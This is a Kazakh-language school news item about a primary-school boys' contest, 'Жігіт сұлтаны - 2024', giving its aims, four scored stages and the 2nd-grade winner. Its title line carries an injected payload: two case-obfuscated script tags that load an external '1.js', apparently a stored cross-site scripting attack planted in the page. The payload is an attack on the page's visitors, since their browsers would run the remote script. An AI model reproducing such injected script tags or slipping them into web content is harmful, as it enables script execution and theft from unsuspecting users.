Жігіт сұлтаны - 2024<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.05.2024

Мектебімізде бастауыш сынып арасында "Жігіт сұлтаны - 2024" өткізілді. 

Сайыстың мақсаты: Ер балаға тән қасиеттерін көрсете отырып, жігіттерімізді батырлыққа , шешендікке , тапқырлыққа , имандылыққа тәрбиелеу. Бойындағы өнерімен дарындылығын , төзімділігін дамыту. Болашаққа сеніммен қадам басқан халқымыздың салт - дәстүрі, әдет - ғұрпы, жөн - жоралғыларын оқушылардың бойына сіңіру, батыл, намысты ұлдарды тәрбиелеу. 

Сайысқа 1-4 сынып оқушылары арасынан жалпы 10 оқушы қатысты. Оқушылар сайыстың мынадай кезеңдерімен жарысқа түсті:

1 кезең: «Таныстырсам өзімді» таныстыру - (5 ұпай)

2 кезең: «Жігітке жеті өнер де аз»  - өз өнерін көрсету (10 ұпай)

3 кезең: «Мақал-мәтелдер»сайысы  (10 ұпай)

4 кезең: «Құралайды көзге атқан» - нысана көздеу (5-10 ұпай аралығы)

Барлық кезеңнен сүрінбей өтіп "Жігіт сұлтаны" атағын 2 сынып оқушысы Ромазанов Рахат иеленді.

Просмотров: 5452


Пікір қосу



Деректерді қолтаңбаға қосу